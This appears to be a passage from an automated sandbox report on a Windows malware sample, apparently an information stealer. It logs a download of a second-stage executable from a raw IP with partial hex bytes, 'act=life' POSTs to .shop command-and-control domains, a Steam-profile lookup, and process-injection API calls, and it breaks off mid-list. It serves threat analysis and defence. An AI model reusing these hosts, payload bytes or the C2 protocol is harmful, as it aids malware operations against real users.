                          Sep 21, 2024 15:15:07.641489029 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.641541958 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.642610073 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.642626047 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.642640114 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.642644882 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.657555103 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:07.657660007 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:07.657753944 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:07.658109903 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:07.658148050 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:08.824162006 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:08.824354887 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:08.826858044 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:08.826869011 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:08.827174902 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:08.828469992 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:08.828501940 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:08.828560114 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:09.430818081 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:09.431066036 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:09.431154013 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:09.431201935 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:09.431227922 CEST44349707104.21.20.40192.168.2.5
                          Sep 21, 2024 15:15:09.431245089 CEST49707443192.168.2.5104.21.20.40
                          Sep 21, 2024 15:15:09.431252956 CEST44349707104.21.20.40192.168.2.5

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 21, 2024 15:15:04.865477085 CEST5530653192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:04.877986908 CEST53553061.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.188726902 CEST6395253192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.198148012 CEST53639521.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.201026917 CEST6142653192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.210361958 CEST53614261.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.213095903 CEST5979853192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.222754002 CEST53597981.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.225372076 CEST5285653192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.234957933 CEST53528561.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.237313986 CEST4986753192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.246218920 CEST53498671.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.248549938 CEST5685153192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.258501053 CEST53568511.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.260772943 CEST5080253192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.271193981 CEST53508021.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.273590088 CEST6367853192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.284075975 CEST53636781.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:06.287282944 CEST6512853192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:06.295128107 CEST53651281.1.1.1192.168.2.5
                          Sep 21, 2024 15:15:07.646572113 CEST5233353192.168.2.51.1.1.1
                          Sep 21, 2024 15:15:07.656585932 CEST53523331.1.1.1192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 21, 2024 15:15:04.865477085 CEST192.168.2.51.1.1.10xf039Standard query (0)miracledzmnqwui.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.188726902 CEST192.168.2.51.1.1.10xcc18Standard query (0)locatedblsoqp.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.201026917 CEST192.168.2.51.1.1.10xcb7eStandard query (0)traineiwnqo.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.213095903 CEST192.168.2.51.1.1.10xbc0aStandard query (0)condedqpwqm.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.225372076 CEST192.168.2.51.1.1.10x8f69Standard query (0)evoliutwoqm.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.237313986 CEST192.168.2.51.1.1.10xeccfStandard query (0)millyscroqwp.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.248549938 CEST192.168.2.51.1.1.10x1b4cStandard query (0)stagedchheiqwo.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.260772943 CEST192.168.2.51.1.1.10x6f37Standard query (0)stamppreewntnq.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.273590088 CEST192.168.2.51.1.1.10x441Standard query (0)caffegclasiqwp.shopA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.287282944 CEST192.168.2.51.1.1.10xb1ebStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:07.646572113 CEST192.168.2.51.1.1.10x9bc3Standard query (0)steppyplantnw.shopA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 21, 2024 15:15:04.877986908 CEST1.1.1.1192.168.2.50xf039No error (0)miracledzmnqwui.shop188.114.97.3A (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:04.877986908 CEST1.1.1.1192.168.2.50xf039No error (0)miracledzmnqwui.shop188.114.96.3A (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.198148012 CEST1.1.1.1192.168.2.50xcc18Name error (3)locatedblsoqp.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.210361958 CEST1.1.1.1192.168.2.50xcb7eName error (3)traineiwnqo.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.222754002 CEST1.1.1.1192.168.2.50xbc0aName error (3)condedqpwqm.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.234957933 CEST1.1.1.1192.168.2.50x8f69Name error (3)evoliutwoqm.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.246218920 CEST1.1.1.1192.168.2.50xeccfName error (3)millyscroqwp.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.258501053 CEST1.1.1.1192.168.2.50x1b4cName error (3)stagedchheiqwo.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.271193981 CEST1.1.1.1192.168.2.50x6f37Name error (3)stamppreewntnq.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.284075975 CEST1.1.1.1192.168.2.50x441Name error (3)caffegclasiqwp.shopnonenoneA (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:06.295128107 CEST1.1.1.1192.168.2.50xb1ebNo error (0)steamcommunity.com92.122.104.90A (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:07.656585932 CEST1.1.1.1192.168.2.50x9bc3No error (0)steppyplantnw.shop104.21.20.40A (IP address)IN (0x0001)false
                          Sep 21, 2024 15:15:07.656585932 CEST1.1.1.1192.168.2.50x9bc3No error (0)steppyplantnw.shop172.67.191.81A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • miracledzmnqwui.shop
                          • steamcommunity.com
                          • steppyplantnw.shop
                          • 147.45.44.131

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704147.45.44.131803356C:\Users\user\Desktop\AD3SI7tuzs.exe
                          TimestampBytes transferredDirectionData
                          Sep 21, 2024 15:15:03.742074966 CEST77OUTGET /files/iy94.exe HTTP/1.1
                          Host: 147.45.44.131
                          Connection: Keep-Alive
                          Sep 21, 2024 15:15:04.378853083 CEST1236INHTTP/1.1 200 OK
                          Date: Sat, 21 Sep 2024 13:15:04 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Last-Modified: Tue, 27 Aug 2024 16:54:28 GMT
                          ETag: "44c00-620ad183c5d5d"
                          Accept-Ranges: bytes
                          Content-Length: 281600
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdos-program
                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 67 ed cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 80 03 00 00 c8 00 00 00 00 00 00 e0 9e 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 b4 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 04 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b5 [TRUNCATED]
                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELgf@@)xCL.text `.rdataU(*@@.data(Z@.relocCD@B
                          Sep 21, 2024 15:15:04.378876925 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: USWV<$T$PFFFFFF1=|D$CN~FD$FD$11Ft$T$$CD$0
                          Sep 21, 2024 15:15:04.378889084 CEST1236INData Raw: 00 4a 47 48 4f c7 84 24 b4 01 00 00 42 4d 42 47 c7 84 24 b8 01 00 00 46 46 47 47 c7 84 24 bc 01 00 00 4a 44 45 37 c7 84 24 c0 01 00 00 36 37 36 3d c7 84 24 c4 01 00 00 3c 3f 3e 3d c7 84 24 c8 01 00 00 3c 3f c8 36 c7 84 24 cc 01 00 00 36 35 34 26
                          Data Ascii: JGHO$BMBG$FFGG$JDE7$676=$<?>=$<?6$654&$*'&)$ "$,.$(*$$#$JI$HX$]D$CN$FO$}$$$
                          Sep 21, 2024 15:15:04.379283905 CEST672INData Raw: 88 54 24 0b 84 d2 0f 95 c0 8b 5c 24 14 89 44 24 1c ff 24 85 f0 c4 43 00 89 f1 89 c8 c0 e8 04 24 01 0f b6 c0 ff 24 85 d0 c4 43 00 80 e1 77 89 4c 24 14 b9 7c 19 44 00 0f b6 5c 24 10 89 dd c1 ed 02 0f b6 04 29 89 de 83 e6 03 01 f0 c7 44 24 04 7c 19
                          Data Ascii: T$\$D$$C$$CwL$|D\$)D$|D1$C$CL$$TP1T$T$\$D$$CDD01$C$$C\$$
                          Sep 21, 2024 15:15:04.379451990 CEST1236INData Raw: c1 ed 02 0f b6 04 29 89 de 83 e6 03 01 f0 c7 44 24 04 7c 19 44 00 0f b6 14 01 31 c9 80 fa ff 0f 94 c1 ff 24 8d d8 c4 43 00 81 cd 01 30 00 00 8b 8c 24 54 02 00 00 89 69 18 80 7c 24 0b 00 0f 94 c0 0f b6 4c 24 10 80 c1 27 80 f9 07 0f 92 c5 20 c5 0f
                          Data Ascii: )D$|D1$C0$Ti|$L$' l$$(C1|$$@CmD,$HCtD,9$HCt$0$Tt$qXCL$L$`C1|$$hCL$
                          Sep 21, 2024 15:15:04.379774094 CEST1236INData Raw: 43 00 b2 04 88 44 24 03 3c 03 0f 95 c5 80 fc 04 0f 94 c0 20 e8 0f b6 f8 ff 24 bd 28 c7 43 00 8b 44 24 20 0c 02 89 44 24 20 8a 64 24 0b 31 d2 8a 44 24 03 84 c0 0f 94 c2 ff 24 95 e0 c6 43 00 8b 4c 24 18 c1 e9 02 83 e1 04 ff a1 f8 c6 43 00 31 db 80
                          Data Ascii: CD$< $(CD$ D$ d$1D$$CL$C11$CD$< $(C=C11$CD$< $(CD$1$0CD$$TD$Al$d$a
                          Sep 21, 2024 15:15:04.379786015 CEST1236INData Raw: 04 89 4c 24 04 ff a2 88 c7 43 00 cc cc cc cc cc 8b 44 24 04 85 c0 74 28 80 38 ef 75 13 80 78 01 bb 75 0d 80 78 02 bf 75 07 83 c0 03 89 44 24 04 8d 44 24 04 6a 00 50 e8 14 00 00 00 83 c4 08 c3 31 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53
                          Data Ascii: L$CD$t(8uxuxuD$D$jP1USWV |$81wmt$4.]SstE.]SsEuMY1$TCD$PUsPC1r ^_[]|$.<$)T$r1}
                          Sep 21, 2024 15:15:04.379797935 CEST272INData Raw: ff 83 c4 08 85 c0 0f 84 43 02 00 00 89 c3 8b 0c 24 89 fa 50 e8 a3 0c 00 00 83 c4 04 85 c0 0f 85 4f 02 00 00 8b 2e 0f b6 5d 00 53 e8 2c 6f 00 00 83 c4 04 85 c0 74 16 45 89 2e 0f b6 5d 00 53 e8 18 6f 00 00 83 c4 04 45 85 c0 75 ec 4d 80 fb 2c 0f 85
                          Data Ascii: C$PO.]S,otE.]SoEuM,DE.]SnEu} } D$T$VCLQ>QB|$t$Vq,$]9]
                          Sep 21, 2024 15:15:04.379810095 CEST1236INData Raw: 83 fb 11 73 05 bb 10 00 00 00 89 d8 83 e0 fa 89 d9 83 e1 04 89 da 83 ca 04 0f af d1 83 f1 04 0f af c8 01 ca 52 ff 15 f8 c7 43 00 83 c4 04 85 c0 0f 84 65 01 00 00 8b 14 24 8b 4a 04 85 c9 89 44 24 04 74 1c 8b 6a 08 85 ed 74 17 c1 e5 02 55 51 50 89
                          Data Ascii: sRCe$JD$tjtUQP4lM1QCD$E]EEM<E.}Wmt)E.}WmEuM<,u8E.]WqmEu]tM
                          Sep 21, 2024 15:15:04.380289078 CEST1236INData Raw: ff cc cc cc cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09 83 79 04 04 75 03 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 31 ff 83 7c 24 24 00 0f 84 ed 00 00 00 8b 5c 24 28 85 db 0f 84 e1 00 00 00 53 e8 7a 68 00 00 83 c4 04 85
                          Data Ascii: L$1tyuAUSWV1|$$\$(Szht-1+tE9u$L$$Y kD$!AD$EKtk#D$T$<tYA94uAD$PgL$(;$u
                          Sep 21, 2024 15:15:04.384749889 CEST1236INData Raw: 24 08 8b 34 82 83 fe ff 74 d5 8b 41 08 39 1c b0 75 e2 8b 41 0c 8b 04 b0 89 44 24 04 50 e8 d2 63 00 00 8b 4c 24 28 83 c4 04 3b 04 24 75 c6 ff 34 24 ff 74 24 08 ff 74 24 30 e8 d6 63 00 00 8b 4c 24 30 83 c4 0c 85 c0 75 ab 8b 41 10 8b 0c b0 85 c9 b8
                          Data Ascii: $4tA9uAD$PcL$(;$u4$t$t$0cL$0uAt1T$,9QxL$1tT$9QvAD$t@1L$1tT$9QvItyuAWVD$H


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549705188.114.97.34436660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          TimestampBytes transferredDirectionData
                          2024-09-21 13:15:05 UTC267OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8
                          Host: miracledzmnqwui.shop
                          2024-09-21 13:15:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                          Data Ascii: act=life
                          2024-09-21 13:15:06 UTC776INHTTP/1.1 200 OK
                          Date: Sat, 21 Sep 2024 13:15:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=pjrrgs9h1d71qc9shbiq0866p9; expires=Wed, 15 Jan 2025 07:01:44 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFjQ8WpCY7Q8VFMgMBHWwNaeaWlSsptdzxrYoTqafZRh%2Bwmos77BCgaaLPKGsvGBa6R9sxBsrTdJgZ3kKppxH1nq0MSShR8leHNS5r8ZQaAOBli4oDuFdesssyMSc1JhtiWYl%2BnsfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c6a52713fd742e7-EWR
                          2024-09-21 13:15:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                          Data Ascii: aerror #D12
                          2024-09-21 13:15:06 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.54970692.122.104.904436660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          TimestampBytes transferredDirectionData
                          2024-09-21 13:15:06 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Host: steamcommunity.com
                          2024-09-21 13:15:07 UTC1870INHTTP/1.1 200 OK
                          Server: nginx
                          Content-Type: text/html; charset=UTF-8
                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                          Cache-Control: no-cache
                          Date: Sat, 21 Sep 2024 13:15:07 GMT
                          Content-Length: 34683
                          Connection: close
                          Set-Cookie: sessionid=4d312f752bf5764a263a79ce; Path=/; Secure; SameSite=None
                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                          2024-09-21 13:15:07 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                          2024-09-21 13:15:07 UTC10062INData Raw: 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63
                          Data Ascii: Class': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_ac
                          2024-09-21 13:15:07 UTC10107INData Raw: 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75
                          Data Ascii: quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/commu


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.549707104.21.20.404436660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          TimestampBytes transferredDirectionData
                          2024-09-21 13:15:08 UTC265OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8
                          Host: steppyplantnw.shop
                          2024-09-21 13:15:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                          Data Ascii: act=life
                          2024-09-21 13:15:09 UTC776INHTTP/1.1 200 OK
                          Date: Sat, 21 Sep 2024 13:15:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=bjgtolkevbh01v8jmuu0spksas; expires=Wed, 15 Jan 2025 07:01:48 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPLgW3DZVE%2BLg1xIhjiPKpIPrE39rjyEKj4pnyC9hvSd%2BRz%2B4BSWoq7gadq%2FTeWCNG1UaJmkIq2UYWdtvstpwdyu8eRWvyvK8fWvYR5d%2B759YCY4Gw8KwD6u66SxsLJEhgm9Kao%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c6a528558524294-EWR
                          2024-09-21 13:15:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                          Data Ascii: aerror #D12
                          2024-09-21 13:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:09:15:02
                          Start date:21/09/2024
                          Path:C:\Users\user\Desktop\AD3SI7tuzs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\AD3SI7tuzs.exe"
                          Imagebase:0x190000
                          File size:14'336 bytes
                          MD5 hash:C9298899BDE5EFB635D28F14A6C62125
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:09:15:03
                          Start date:21/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                          Imagebase:0xa30000
                          File size:65'440 bytes
                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:23.4%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:11.9%
                            Total number of Nodes:59
                            Total number of Limit Nodes:2
                            execution_graph 2221 6e0848 2224 6e0878 2221->2224 2225 6e08c5 2224->2225 2228 6e0908 2225->2228 2229 6e0931 2228->2229 2232 6e0980 2229->2232 2233 6e09b4 2232->2233 2234 6e094b 2232->2234 2237 6e0a70 2233->2237 2241 6e0a61 2233->2241 2238 6e0aad 2237->2238 2245 6e0ae1 2238->2245 2242 6e0a70 2241->2242 2244 6e0ae1 12 API calls 2242->2244 2243 6e0aca 2243->2234 2244->2243 2246 6e0aee 2245->2246 2247 6e0b33 2245->2247 2250 6e0bef 2246->2250 2254 6e0c00 2246->2254 2251 6e0c00 2250->2251 2252 6e0c49 2251->2252 2258 6e31a8 2251->2258 2252->2247 2255 6e0c25 2254->2255 2256 6e0c49 2255->2256 2257 6e31a8 12 API calls 2255->2257 2256->2247 2257->2256 2260 6e31e7 2258->2260 2259 6e391b 2259->2252 2260->2259 2269 6e2ba8 WriteProcessMemory 2260->2269 2270 6e2ba2 WriteProcessMemory 2260->2270 2271 6e2a08 Wow64SetThreadContext 2260->2271 2272 6e2a10 Wow64SetThreadContext 2260->2272 2273 6e2e24 2260->2273 2277 6e2e30 2260->2277 2281 6e2c92 2260->2281 2285 6e2c98 2260->2285 2289 6e2ae0 2260->2289 2293 6e2ae8 2260->2293 2297 